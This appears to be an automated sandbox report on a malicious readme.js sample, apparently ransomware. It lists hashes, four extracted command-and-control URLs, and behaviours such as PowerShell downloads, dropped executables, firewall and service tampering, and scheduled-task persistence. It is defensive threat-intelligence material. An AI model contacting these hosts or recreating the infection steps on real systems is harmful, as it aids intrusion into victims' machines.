Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
13-01-2021 06:49
Static task
static1
Behavioral task
behavioral1
Sample
readme.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
readme.js
Resource
win10v20201028
General
-
Target
readme.js
-
Size
10KB
-
MD5
db49b6f1f379122685be9553c5cc0f37
-
SHA1
45788a5c0c0d97d9bed9c0e6115eca1edbad8ba6
-
SHA256
d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09
-
SHA512
1eae9f302d90b3a1887b9f74927bf9bfac0519ae0f4019497177eca3ac2086ed71b4296193bcf62ba493d7fe2e4d57f42ded79ed5e8789abca206a2185ebab23
Malware Config
Extracted
http://t.zz3r0.com
Extracted
http://t.zer9g.com
Extracted
http://t.bb3u9.com
Extracted
http://t.bb3u9.com
Signatures
-
Blocklisted process makes network request 8 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.EXEflow pid process 7 1976 powershell.exe 19 2640 powershell.EXE 23 1900 powershell.EXE 25 1900 powershell.EXE 38 2612 powershell.EXE 40 2612 powershell.EXE 41 2640 powershell.EXE 44 2640 powershell.EXE -
Executes dropped EXE 3 IoCs
Processes:
0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exepid process 3016 0MSJ3Ad6IVD.exe 1536 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe -
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 7 IoCs
Processes:
cmd.exetaskmgr.exepid process 2012 cmd.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe -
Drops file in System32 directory 89 IoCs
Processes:
0MSJ3Ad6IVD.exepowershell.EXEpowershell.EXEpowershell.EXE0MSJ3Ad6IVD.exepowershell.EXE0MSJ3Ad6IVD.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191 powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bddef163-7995-45d6-82ae-d30c260f4fa2 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01748f9b-7dda-4310-a8ad-a0d6c6409f28 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de49895d-8b72-4a81-86db-ca55df7e149b powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7e321290-caea-4fb9-a887-5a15cfd6f8ab 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46f982f5-c0e7-4773-a194-f3dbd533d73f 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff5a6a98-3740-4044-84a4-40537bdb49ba 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_49055437-0d59-46a2-8397-246c631f7853 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff5a6a98-3740-4044-84a4-40537bdb49ba 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de89cd22-7d80-451a-a9b1-7602e398f466 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_12a6dc08-011e-48d9-922f-94fd833c93f5 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff5a6a98-3740-4044-84a4-40537bdb49ba 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46f982f5-c0e7-4773-a194-f3dbd533d73f 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46f982f5-c0e7-4773-a194-f3dbd533d73f powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce2f09c4-fd4a-416e-a488-3c67839e867e powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01748f9b-7dda-4310-a8ad-a0d6c6409f28 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff5a6a98-3740-4044-84a4-40537bdb49ba powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01 0MSJ3Ad6IVD.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623 powershell.EXE -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2412 schtasks.exe 2516 schtasks.exe 2764 schtasks.exe 928 schtasks.exe 2084 schtasks.exe 3056 schtasks.exe 2564 schtasks.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXEpid process 2828 NETSTAT.EXE -
Modifies data under HKEY_USERS 10 IoCs
Processes:
0MSJ3Ad6IVD.exepowershell.EXEpowershell.EXEdescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" 0MSJ3Ad6IVD.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 20e915d078e9d601 powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ 0MSJ3Ad6IVD.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" 0MSJ3Ad6IVD.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1980 notepad.exe -
Suspicious behavior: EnumeratesProcesses 121 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.EXE0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exepowershell.EXEpowershell.exepid process 1976 powershell.exe 1976 powershell.exe 2328 powershell.EXE 2328 powershell.EXE 2640 powershell.EXE 2640 powershell.EXE 1900 powershell.EXE 1900 powershell.EXE 3016 0MSJ3Ad6IVD.exe 1536 0MSJ3Ad6IVD.exe 1536 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 3016 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2612 powershell.EXE 2612 powershell.EXE 3028 powershell.exe 3028 powershell.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe 2084 0MSJ3Ad6IVD.exe -
Suspicious use of AdjustPrivilegeToken 296 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1976 powershell.exe Token: SeIncreaseQuotaPrivilege 1940 WMIC.exe Token: SeSecurityPrivilege 1940 WMIC.exe Token: SeTakeOwnershipPrivilege 1940 WMIC.exe Token: SeLoadDriverPrivilege 1940 WMIC.exe Token: SeSystemProfilePrivilege 1940 WMIC.exe Token: SeSystemtimePrivilege 1940 WMIC.exe Token: SeProfSingleProcessPrivilege 1940 WMIC.exe Token: SeIncBasePriorityPrivilege 1940 WMIC.exe Token: SeCreatePagefilePrivilege 1940 WMIC.exe Token: SeBackupPrivilege 1940 WMIC.exe Token: SeRestorePrivilege 1940 WMIC.exe Token: SeShutdownPrivilege 1940 WMIC.exe Token: SeDebugPrivilege 1940 WMIC.exe Token: SeSystemEnvironmentPrivilege 1940 WMIC.exe Token: SeRemoteShutdownPrivilege 1940 WMIC.exe Token: SeUndockPrivilege 1940 WMIC.exe Token: SeManageVolumePrivilege 1940 WMIC.exe Token: 33 1940 WMIC.exe Token: 34 1940 WMIC.exe Token: 35 1940 WMIC.exe Token: SeIncreaseQuotaPrivilege 1904 WMIC.exe Token: SeSecurityPrivilege 1904 WMIC.exe Token: SeTakeOwnershipPrivilege 1904 WMIC.exe Token: SeLoadDriverPrivilege 1904 WMIC.exe Token: SeSystemProfilePrivilege 1904 WMIC.exe Token: SeSystemtimePrivilege 1904 WMIC.exe Token: SeProfSingleProcessPrivilege 1904 WMIC.exe Token: SeIncBasePriorityPrivilege 1904 WMIC.exe Token: SeCreatePagefilePrivilege 1904 WMIC.exe Token: SeBackupPrivilege 1904 WMIC.exe Token: SeRestorePrivilege 1904 WMIC.exe Token: SeShutdownPrivilege 1904 WMIC.exe Token: SeDebugPrivilege 1904 WMIC.exe Token: SeSystemEnvironmentPrivilege 1904 WMIC.exe Token: SeRemoteShutdownPrivilege 1904 WMIC.exe Token: SeUndockPrivilege 1904 WMIC.exe Token: SeManageVolumePrivilege 1904 WMIC.exe Token: 33 1904 WMIC.exe Token: 34 1904 WMIC.exe Token: 35 1904 WMIC.exe Token: SeIncreaseQuotaPrivilege 1320 WMIC.exe Token: SeSecurityPrivilege 1320 WMIC.exe Token: SeTakeOwnershipPrivilege 1320 WMIC.exe Token: SeLoadDriverPrivilege 1320 WMIC.exe Token: SeSystemProfilePrivilege 1320 WMIC.exe Token: SeSystemtimePrivilege 1320 WMIC.exe Token: SeProfSingleProcessPrivilege 1320 WMIC.exe Token: SeIncBasePriorityPrivilege 1320 WMIC.exe Token: SeCreatePagefilePrivilege 1320 WMIC.exe Token: SeBackupPrivilege 1320 WMIC.exe Token: SeRestorePrivilege 1320 WMIC.exe Token: SeShutdownPrivilege 1320 WMIC.exe Token: SeDebugPrivilege 1320 WMIC.exe Token: SeSystemEnvironmentPrivilege 1320 WMIC.exe Token: SeRemoteShutdownPrivilege 1320 WMIC.exe Token: SeUndockPrivilege 1320 WMIC.exe Token: SeManageVolumePrivilege 1320 WMIC.exe Token: 33 1320 WMIC.exe Token: 34 1320 WMIC.exe Token: 35 1320 WMIC.exe Token: SeIncreaseQuotaPrivilege 1992 WMIC.exe Token: SeSecurityPrivilege 1992 WMIC.exe Token: SeTakeOwnershipPrivilege 1992 WMIC.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
Processes:
taskmgr.exepid process 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe 2776 taskmgr.exe -
Suspicious use of WriteProcessMemory 924 IoCs
Processes:
wscript.execmd.exepowershell.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2024 wrote to memory of 1184 2024 wscript.exe cmd.exe PID 2024 wrote to memory of 1184 2024 wscript.exe cmd.exe PID 2024 wrote to memory of 1184 2024 wscript.exe cmd.exe PID 1184 wrote to memory of 1980 1184 cmd.exe notepad.exe PID 1184 wrote to memory of 1980 1184 cmd.exe notepad.exe PID 1184 wrote to memory of 1980 1184 cmd.exe notepad.exe PID 1184 wrote to memory of 1976 1184 cmd.exe powershell.exe PID 1184 wrote to memory of 1976 1184 cmd.exe powershell.exe PID 1184 wrote to memory of 1976 1184 cmd.exe powershell.exe PID 1976 wrote to memory of 920 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 920 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 920 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1812 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1812 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1812 1976 powershell.exe cmd.exe PID 1812 wrote to memory of 1904 1812 cmd.exe WMIC.exe PID 1812 wrote to memory of 1904 1812 cmd.exe WMIC.exe PID 1812 wrote to memory of 1904 1812 cmd.exe WMIC.exe PID 1976 wrote to memory of 272 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 272 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 272 1976 powershell.exe cmd.exe PID 272 wrote to memory of 1940 272 cmd.exe WMIC.exe PID 272 wrote to memory of 1940 272 cmd.exe WMIC.exe PID 272 wrote to memory of 1940 272 cmd.exe WMIC.exe PID 1976 wrote to memory of 1120 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1120 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1120 1976 powershell.exe cmd.exe PID 1120 wrote to memory of 1320 1120 cmd.exe WMIC.exe PID 1120 wrote to memory of 1320 1120 cmd.exe WMIC.exe PID 1120 wrote to memory of 1320 1120 cmd.exe WMIC.exe PID 1976 wrote to memory of 1912 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1912 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1912 1976 powershell.exe cmd.exe PID 1912 wrote to memory of 1992 1912 cmd.exe WMIC.exe PID 1912 wrote to memory of 1992 1912 cmd.exe WMIC.exe PID 1912 wrote to memory of 1992 1912 cmd.exe WMIC.exe PID 1976 wrote to memory of 1236 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1236 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1236 1976 powershell.exe cmd.exe PID 1236 wrote to memory of 1608 1236 cmd.exe WMIC.exe PID 1236 wrote to memory of 1608 1236 cmd.exe WMIC.exe PID 1236 wrote to memory of 1608 1236 cmd.exe WMIC.exe PID 1976 wrote to memory of 1796 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1796 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1796 1976 powershell.exe cmd.exe PID 1796 wrote to memory of 1516 1796 cmd.exe WMIC.exe PID 1796 wrote to memory of 1516 1796 cmd.exe WMIC.exe PID 1796 wrote to memory of 1516 1796 cmd.exe WMIC.exe PID 1976 wrote to memory of 1032 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1032 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1032 1976 powershell.exe cmd.exe PID 1032 wrote to memory of 1920 1032 cmd.exe WMIC.exe PID 1032 wrote to memory of 1920 1032 cmd.exe WMIC.exe PID 1032 wrote to memory of 1920 1032 cmd.exe WMIC.exe PID 1976 wrote to memory of 1812 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1812 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 1812 1976 powershell.exe cmd.exe PID 1976 wrote to memory of 928 1976 powershell.exe schtasks.exe PID 1976 wrote to memory of 928 1976 powershell.exe schtasks.exe PID 1976 wrote to memory of 928 1976 powershell.exe schtasks.exe PID 1976 wrote to memory of 2084 1976 powershell.exe schtasks.exe PID 1976 wrote to memory of 2084 1976 powershell.exe schtasks.exe PID 1976 wrote to memory of 2084 1976 powershell.exe schtasks.exe PID 1976 wrote to memory of 2256 1976 powershell.exe schtasks.exe
Processes
-
